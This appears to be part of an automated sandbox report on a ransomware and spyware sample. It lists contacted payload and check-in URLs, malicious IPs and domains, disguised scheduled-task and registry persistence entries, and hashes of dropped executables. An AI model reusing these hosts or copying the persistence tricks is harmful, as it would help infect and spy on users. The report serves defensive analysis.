                                                                                  https://api.2ip.ua/geo.jsonsECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://aaa.apiaaaeg.com/P2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://aaa.apiaaaeg.com/Q2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.2ip.ua/geo.json5dECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://aaa.apiaaaeg.com:80/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948bHU82A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://aaa.apiaaaeg.com/check/safewQ2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.359830195.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.347268530.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388576135.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://avtlsgosecure.c24EAA.exe, 0000000C.00000003.557836455.0000000002483000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://api.2ip.ua/ECFD.exe, 00000009.00000002.615541092.000000000071A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://api.2ip.ua/geo.json)dECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.facebook.2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://aaa.apiaaaeg.com/T2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://aaa.apiaaaeg.com/V2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/GG1Y0sYc7My.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://aaa.apiaaaeg.com/check/safeaaeg.comu2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://api.2ip.ua/geo.jsonECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://aaa.apiaaaeg.com/f2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/w8iOGQ_Hw3c.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://aaa.apiaaaeg.com/check/safe2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://aaa.apiaaaeg.com:80/check/safe2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948SE2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/02A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://aaa.apiaaaeg.com/check/safeeR2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/02A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://furubujjul.net/Mozilla/5.0explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a9482A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                172.67.203.213
                                                                                                                furubujjul.netUnited States
                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                66.96.149.30
                                                                                                                keziheritier.comUnited States
                                                                                                                29873BIZLAND-SDUStrue
                                                                                                                176.124.192.220
                                                                                                                avtlsgosecure.comRussian Federation
                                                                                                                59652GULFSTREAMUAtrue
                                                                                                                185.220.204.62
                                                                                                                pelegisr.comIsrael
                                                                                                                41436CLOUDWEBMANAGE-EUGBtrue
                                                                                                                140.82.121.3
                                                                                                                github.comUnited States
                                                                                                                36459GITHUBUSfalse
                                                                                                                157.240.17.35
                                                                                                                star-mini.c10r.facebook.comUnited States
                                                                                                                32934FACEBOOKUSfalse
                                                                                                                45.138.74.52
                                                                                                                unknownRussian Federation
                                                                                                                202306HOSTGLOBALPLUS-ASRUtrue
                                                                                                                157.240.20.35
                                                                                                                unknownUnited States
                                                                                                                32934FACEBOOKUSfalse
                                                                                                                198.23.58.153
                                                                                                                rukangiralawchambers.orgUnited States
                                                                                                                32748STEADFASTUStrue
                                                                                                                172.67.144.83
                                                                                                                kkh.eiwagggg.comUnited States
                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                179.43.163.115
                                                                                                                unknownPanama
                                                                                                                51852PLI-ASCHtrue
                                                                                                                IP
                                                                                                                192.168.2.1
                                                                                                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                Analysis ID:722349
                                                                                                                Start date and time:2022-10-13 13:05:13 +02:00
                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                Overall analysis duration:0h 13m 19s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:light
                                                                                                                Sample file name:file.exe
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                Number of analysed new started processes analysed:21
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:1
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • HDC enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.rans.troj.spyw.evad.winEXE@26/25@55/12
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 75%
                                                                                                                HDC Information:
                                                                                                                • Successful, ratio: 16.3% (good quality ratio 12.4%)
                                                                                                                • Quality average: 42.1%
                                                                                                                • Quality standard deviation: 30.9%
                                                                                                                HCA Information:Failed
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                • Excluded IPs from analysis (whitelisted): 40.126.32.73, 40.126.32.75, 20.190.160.12, 40.126.32.132, 40.126.32.139, 20.190.160.21, 20.190.160.23, 20.190.160.15, 20.42.65.92, 52.168.117.172
                                                                                                                • Excluded domains from analysis (whitelisted): prda.aadg.msidentity.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdeus07.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                TimeTypeDescription
                                                                                                                13:07:14Task SchedulerRun new task: Firefox Default Browser Agent 9B5A205DE77D1712 path: C:\Users\user\AppData\Roaming\tfgatra
                                                                                                                13:08:02Task SchedulerRun new task: Firefox Default Browser Agent CB62A9506FC1F184 path: C:\Users\user\AppData\Roaming\udgatra
                                                                                                                13:08:16API Interceptor2x Sleep call for process: EAA.exe modified
                                                                                                                13:08:16API Interceptor2x Sleep call for process: 2A57.exe modified
                                                                                                                13:08:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ac81e9ae-10c3-4df8-8036-a8a7152c1bf0\ECFD.exe" --AutoStart
                                                                                                                13:08:50Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\ac81e9ae-10c3-4df8-8036-a8a7152c1bf0\ECFD.exe s>--Task
                                                                                                                13:08:53Task SchedulerRun new task: wfyoot.exe path: C:\Users\user\AppData\Local\Temp\0fd408e638\wfyoot.exe
                                                                                                                No context
                                                                                                                No context
                                                                                                                No context
                                                                                                                No context
                                                                                                                No context
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Thu Oct 13 20:08:11 2022, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):33566
                                                                                                                Entropy (8bit):1.9667965344799225
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:f22A9X0kqO6KNzSI+NeLMfljkfEqy3pcWpsxaUpD:P216cVRIfyfy5R0D
                                                                                                                MD5:F3DBA93A4AD9AC0ABC871C5B540BC0E1
                                                                                                                SHA1:40E64D5A55D9AE299A01D847BF1979229B4FDE02
                                                                                                                SHA-256:C6B54E769E709D231BE5F9A0DCA8E31AE9D506B74C01C55CFC2AE08204B03BAE
                                                                                                                SHA-512:AC4DCBBA3F2B6D536F44C34AD8083521A9F5CB7F33FB5BFC5B6BACB207A0DC6E1948AF9E992EB5D822115129E0B7970F13AC547A8E50FF1CDE677E54CD593012
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP....... .......+pHc.........................................&..........T.......8...........T...........(....m.......... ................................................................................U...........B..............GenuineIntelW...........T............pHc............................. ..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Thu Oct 13 20:08:14 2022, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):46576
                                                                                                                Entropy (8bit):2.1993660096694247
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:22ISH2gOeJif39MdLHvTQiGbjqRmIKDW9yfWkvIz:Y3eBdLsccW9yCz
                                                                                                                MD5:0AD37EA7A728B767843638DCCC697C2D
                                                                                                                SHA1:FCEDD4B75992A4B33858B3AEC26D2EE5FD72E010
                                                                                                                SHA-256:1B57D7A13CFB22EF8A3C40C9CAC9FF86B669E56C929AEE1B401CC301BB7D3192
                                                                                                                SHA-512:1A7C5EA8DA34DEC8C06E0B1EF7665D6EC05CCD725C869C17634F10868B8D89DE053A6D39DD2D770DB23701B91CCC31029590309B261ECDF55D1A31688A7862DA
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP....... ........pHc....................................$....(..........T.......8...........T...............@............................................................................................U...........B......h.......GenuineIntelW...........T.......,....pHc............................. ..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8326
                                                                                                                Entropy (8bit):3.7007926414078796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:Rrl7r3GLNiK66qe6YBStSUSPgmfeYsSwCpDs89bCAsft2m:RrlsNiP6j6YBoSUSPgmfeYsSZCTfF
                                                                                                                MD5:F3AD4A1D18F602A0E8CDE15F64955848
                                                                                                                SHA1:DF516E540E29352A9DC9B3D47E0A27026C8969AC
                                                                                                                SHA-256:643673F44BB381FF804CFD4736C5B6F0F73D9A0B230C3789DEF84F70476A2D4B
                                                                                                                SHA-512:D65B373D94B8DF0249FCFED32B8B47E43C94223507E469B2C9107437FB832AC1E989B8412D96682C85A1F6525BF9177797CD799B281B6764981B469DA396DD1A
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.0.0.<./.P.i.d.>.......
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4579
                                                                                                                Entropy (8bit):4.475031016875292
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwSD8zsJMtJgtWI9isWgc8sqYjK8fm8M4J66WF8+q8sbF3Otntrd:uITfJMHZFgrsqY7JzPZFetntrd
                                                                                                                MD5:0FEF6668BE7BDFA6F3981490C2410FE2
                                                                                                                SHA1:DE65348E83D3BFF15F81E2EC2D09A3C33C056A9F
                                                                                                                SHA-256:E4D39A431591D952E514C01F18F46024A8C025DEC780736B453604B7933CC9B0
                                                                                                                SHA-512:74F55CFE5C2E8B362A1010C2682553DFA9B1AA99D3F9E8D489327EB12CE44EC86C1AA0FD3356662D7B66EEE6D6D4AB177A34F9DFEC9C9DC442C47DAE95E0EB8C
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1734078" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8322
                                                                                                                Entropy (8bit):3.7013727576255433
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:Rrl7r3GLNi9N6BP6YBSfSU/rWSgmf6GsSwCpDg89b0rsfecm:RrlsNiX6p6YBaSUTWSgmf6GsS90wfM
                                                                                                                MD5:B22B6E57B5E9FD8999EC5D61CD5AA88E
                                                                                                                SHA1:9A28DD2ADD68B7C7EBB679AABA9DD529717A6386
                                                                                                                SHA-256:0555A02CDF1409FB9ABEFEA5CD6423397E18D705BEE9D10C8EF998458FB351DA
                                                                                                                SHA-512:26D03D3D9E1CC4A0EFC09B1C970403BF1128939482F6F4F3AC8488F0AA81737DD644145683BEDF99300CC96E7CBAD5D49A8096C019BB55F67B792FEEDE90CFB1
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.2.<./.P.i.d.>.........
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4582
                                                                                                                Entropy (8bit):4.486508370058079
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwSD8zsJMtJgtWI9isWgc8sqYjs8fm8M4JBuWFd+q8UbFOFWQM9d:uITfJMHZFgrsqY1JQOhF+WQad
                                                                                                                MD5:42BBBB373617F0C081A36ECBC7853613
                                                                                                                SHA1:27CFBFD1FBCF0F2A19AD2431B0F2123CDAE0B3D4
                                                                                                                SHA-256:A49D6E30B00A78B24C069F793DE1C9CAB4875D5AE27B205B867C77B030FAC0AD
                                                                                                                SHA-512:32B2F510466904FD01531A8FA1293A6AFFB2FCFF32ED79AF784ED30E4F8B5B5E2D7CDC255FF06DFB52B9EB3DD09ED6D4606F3AE49E77748A0FE1E08EC7172320
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1734078" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3639808
                                                                                                                Entropy (8bit):7.797220477180319
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:wpNo2IecaP2hSdky9lqZ8GaNFvf4cISKJ3UIDslW+5zs4L:R2uT8hbqeTISKJ34/
                                                                                                                MD5:D4381F0A771033752684747EB4D55FC7
                                                                                                                SHA1:5A87BE21DE6AA7275EC3B076DFCD72469B129DD7
                                                                                                                SHA-256:A8756585EF0E2E4E7479606E49A56E52C871C24B65C356B6B38F29CBAE300ECC
                                                                                                                SHA-512:9869D894BD243B5E8D957190920C6764A5FA837D34BB5C7A1AE6E8B6BD8A194E056DA9E9D38D516EDFF17B4A3B9707F77F2A0766CF8F00DE50B142ABAE35BF10
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....>Ec..........#..................I........@..............................`........... ..................................................n,.............0\`.,...........................................X`G.0....[`.0............pF..............................text...\........................... ..`.rdata...... ......................@..@.data..............................@....pdata..$....`......................@..@_RDATA..............................@..@.vmp0...(_..........................`..`.vmp1...\.7..`)...7.................`..h........................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):214528
                                                                                                                Entropy (8bit):6.9549527491413965
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:mDZAFBjZMd2oPRwL/GGlVKcNK5YyGUHhkTZE8MImkrmrrkIO:4sSILOGlD6hai8MIiP
                                                                                                                MD5:DCFBBF3AE2711BDA9BF01083B521D01B
                                                                                                                SHA1:1D5DC2128D93043067585145B5F974E9631C6C41
                                                                                                                SHA-256:A791C815D720D172875DF63C2ED30C0BAD388BD5B7069CA8B6194402064697B2
                                                                                                                SHA-512:E3F2F98A11AE2482E64E1BEDD330FE55BDE5CA9CC623D1FE80D60D0D31C522726FC094F0279348E6A4727E48DF6E015F2C24044CE15A2BD86F476A0130789BC7
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............a...a...a......a.....a..;....a...`.A.a......a......a......a.Rich..a.........................PE..L.....`.....................V....................@.......................... ......iW..........................................P.......8L...........................................................9..@...............8............................text............................... ..`.data...<...........................@....rsrc...8L.......N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):302592
                                                                                                                Entropy (8bit):6.886167910950407
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:55yOMLtCJiEbrGKKXiUCUnrXMPeigavwVfL:5HMLeBbr8XFRcPT8
                                                                                                                MD5:9A1AC1F6D72E30C8E7577955CD6F39C0
                                                                                                                SHA1:850E0CA8AD16B344E162A209CEE1B4E88C090AEB
                                                                                                                SHA-256:565C7AFC0803040A46CCE3FAAFC2121DF15315EB2BA98318B88152B03D36E98A
                                                                                                                SHA-512:60A12A4E7A8A0B375D7C5F9624CE10C2C06DC9DDE1AA4876564AF799647C1DDC4F292CE610AC36D916E80D4D8BBAD3D2173D82ED3DFF4BBD336D1029C3BC87E9
                                                                                                                Malicious:true
                                                                                                                Antivirus:
